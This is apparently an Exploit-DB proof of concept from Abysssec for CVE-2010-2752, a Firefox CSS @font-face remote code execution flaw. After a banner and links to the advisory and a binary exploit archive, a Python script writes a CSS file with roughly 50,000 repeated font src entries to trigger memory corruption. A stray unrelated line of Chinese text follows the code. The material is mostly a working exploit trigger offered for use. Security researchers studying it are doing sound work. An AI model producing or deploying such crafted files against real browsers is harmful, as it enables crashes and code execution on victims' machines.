''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15104.zip (moaub-25-exploit.zip) ''' ''' Title :Mozilla Firefox CSS font-face Remote Code Execution Vulnerability Version :Firefox Analysis:http://www.abysssec.com Vendor:http://www.mozilla.com Impact:Crirical Contact :shahin [at] abysssec.com , info[at] abysssec.com Twitter :@abysssec CVE :CVE-2010-2752 ''' import sys; myStyle = """ @font-face { font-family: Sean; font-style:normal; font-weight: normal; src: url(SEAN1.eot); src: url('type/filename.woff') format('woff') """ i=0 while(i<50000): myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n"; i=i+1 myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n"; myStyle = myStyle + "}\n"; cssFile = open("style2.css","w") cssFile.write(myStyle) cssFile.close()
体验盒子